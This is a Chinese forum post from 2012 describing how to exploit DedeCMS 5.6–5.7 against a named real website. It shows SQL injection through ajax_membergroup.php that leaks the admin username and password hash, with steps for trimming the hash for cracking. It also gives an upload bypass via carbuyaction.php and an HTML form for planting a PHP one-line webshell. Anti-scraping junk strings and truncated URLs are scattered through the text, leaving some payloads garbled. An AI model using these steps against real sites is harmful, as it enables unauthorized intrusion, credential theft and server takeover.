找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2898|回复: 0
打印 上一主题 下一主题

dedecms5.6-5.7注入与上传漏洞利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 10:56:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
①注入漏洞。
- ^9 G4 f# z  _( Z- g/ b7 t这站 http://www.political-security.com/1 |1 H6 a& ~; b1 A
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,/ E! n" h" |: R9 J0 A' }8 u
www.political-security.com/data/mysql_error_trace.inc 爆后台
! P+ T8 m9 q1 P) E8 H) b然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
1 y) |4 \, ]1 a. {, q然后写上语句
. i; e2 z: }; G, k4 @( o查看管理员帐号
# j) d3 q5 r! k2 U# O! Hhttp://www.political-security.co ... &membergroup=@`
# [, J+ U2 I. j6 x  _
! d' {& z) l7 R! Z1 f/ {9 jadmin
9 t3 j# U/ P! y$ g" G7 m
: ?' |( H! L8 R2 _. z" ]7 E7 ^查看管理员密码% G/ [$ D- C5 v( g% K
 http://www.political-security.co ... &membergroup=@`
8 U+ p! A, R# U' M4 F; V
6 h' ?7 l! S5 m6 a5 I8d29b1ef9f8c5a5af429# @: y6 _/ s2 U2 q

$ y9 u6 D* D+ N2 F& f0 j查看管理员密码
" B& r  T; y! R" r6 A$ [" }
6 |. o) Z% j. N* ^; T/ F& w* {! C得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5( B1 w2 t2 Z) \* F- a. X
! ]1 Q/ }6 d% [1 U! A/ ?; @
8d2, y5 a2 v* [5 x3 O( T4 L/ ^0 A. c
9b1ef9f8c5a5af42
1 _; _4 ]* ]( b8 w4 V$ _3 T  @0 w92 n) o2 c  C9 h  n
7 c, _' B9 v) s$ b3 \& u
cmd5没解出来 只好测试第二个方法
6 h7 M* E6 I: c# H( x
: a+ |$ r" e& N7 O2 }, b' B, i0 Z1 A: O3 h# k. G
②上传漏洞:
! K7 d! ^4 Z4 |4 P) _. ], t( ?! [5 P9 Y/ I$ V2 A
只要登陆会员中心,然后访问页面链接2 M! P0 W& W9 n, P8 C  m
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
: b# c2 R2 v2 `6 N
" o5 ^" _; Y0 Y9 x+ J- v/ H: S' `如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
/ @* G3 a* d! x5 w
! ]1 r, x7 \! [于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
. ?5 O7 G/ ~7 g9 W2 C- s8 w" q% w: }; R9 C
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
; ]  V  l" W5 ]$ q) F4 F7 j. T或者1 C$ S+ z' D- |9 t
即可上传成功
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表